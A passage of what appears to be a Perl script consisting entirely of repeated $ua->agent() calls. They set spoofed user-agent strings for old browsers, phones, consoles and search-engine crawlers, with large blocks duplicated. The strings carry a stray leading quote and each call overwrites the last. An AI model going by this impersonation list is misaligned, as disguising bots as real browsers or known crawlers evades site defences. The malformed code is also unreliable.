  4091. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)");
  4092. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4093. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4094. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)");
  4095. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4096. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)");
  4097. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4098. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4099. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4100. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4101. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4102. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4103. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4104. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4105. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4106. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4107. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4108. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4109. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4110. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4111. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4112. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4113. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4114. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4115. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4116. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4117. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4118. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4119. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4120. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4121. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4122. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4123. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4124. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4125. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4126. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4127. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4128. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4129. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4130. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4131. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4132. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4133. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4134. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4135. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4136. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4137. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4138. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4139. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4140. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4141. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4142. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4143. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4144. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4145. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4146. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4147. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4148. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4149. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4150. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4151. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4152. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4153. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4154. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4155. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4156. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4157. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4158. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4159. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4160. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4161. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4162. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4163. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4164. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4165. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4166. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4167. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4168. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4169. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4170. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4171. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4172. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4173. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4174. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
  4175. $ua->agent("'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)");
  4176. $ua->agent("'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)");
  4177. $ua->agent("'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16");
  4178. $ua->agent("'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4179. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)");
  4180. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4181. $ua->agent("'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)");
  4182. $ua->agent("'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)");
  4183. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
  4184. $ua->agent("'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0");
  4185. $ua->agent("'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)");
  4186. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)");
  4187. $ua->agent("'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4188. $ua->agent("'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)");
  4189. $ua->agent("'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10");
  4190. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)");
  4191. $ua->agent("'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007");
  4192. $ua->agent("'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179");
  4193. $ua->agent("'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620");
  4194. $ua->agent("'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com");
  4195. $ua->agent("'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)");
  4196. $ua->agent("'Mozilla/4.0 (compatible; Arachmo)");
  4197. $ua->agent("'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)");
  4198. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4199. $ua->agent("'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
  4200. $ua->agent("'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)");
  4201. $ua->agent("'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)");
  4202. $ua->agent("'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)");
  4203. $ua->agent("'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)");
  4204. $ua->agent("'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)");
  4205. $ua->agent("'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)");
  4206. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4207. $ua->agent("'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )");
  4208. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4209. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)");
  4210. $ua->agent("'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)");
  4211. $ua->agent("'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)");
  4212. $ua->agent("'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)");
  4213. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)");
  4214. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)");
  4215. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
  4216. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA");
  4217. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2");
  4218. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1");
  4219. $ua->agent("'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)");
  4220. $ua->agent("'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A");
  4221. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 3.55)");
  4222. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 2.00)");
  4223. $ua->agent("'Mozilla/5.0 (PLAYSTATION 3; 1.00)");
  4224. $ua->agent("'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0");
  4225. $ua->agent("'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)");
  4226. $ua->agent("'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)");
  4227. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4228. $ua->agent("'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)");
  4229. $ua->agent("'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)");
  4230. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)");
  4231. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ");
  4232. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)");
  4233. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4234. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
  4235. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)");
  4236. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})");
  4237. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))");
  4238. $ua->agent("'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)");
  4239. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51");
  4240. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1");
  4241. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)");
  4242. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)");
  4243. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8");
  4244. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)");
  4245. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4246. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4247. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4248. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1");
  4249. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4250. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4251. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4252. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4253. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)");
  4254. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4255. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)");
  4256. $ua->agent("'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51");
  4257. $ua->agent("'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3");
  4258. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)");
  4259. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)");
  4260. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)");
  4261. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E");
  4262. $ua->agent("'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1");
  4263. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)");
  4264. $ua->agent("'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15");
  4265. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57");
  4266. $ua->agent("'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4267. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)");
  4268. $ua->agent("'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)");
  4269. $ua->agent("'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0");
  4270. $ua->agent("'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g");
  4271. $ua->agent("'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)");
  4272. $ua->agent("'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125");
  4273. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)");
  4274. $ua->agent("'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413");
  4275. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)");
  4276. $ua->agent("'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)");
  4277. $ua->agent("'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)");
  4278. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)");
  4279. $ua->agent("'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)");
  4280. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)");
  4281. $ua->agent("'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10");
  4282. $ua->agent("'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4");
  4283. $ua->agent("'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0");
  4284. $ua->agent("'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10");
  4285. $ua->agent("'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)");
  4286. $ua->agent("'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)");
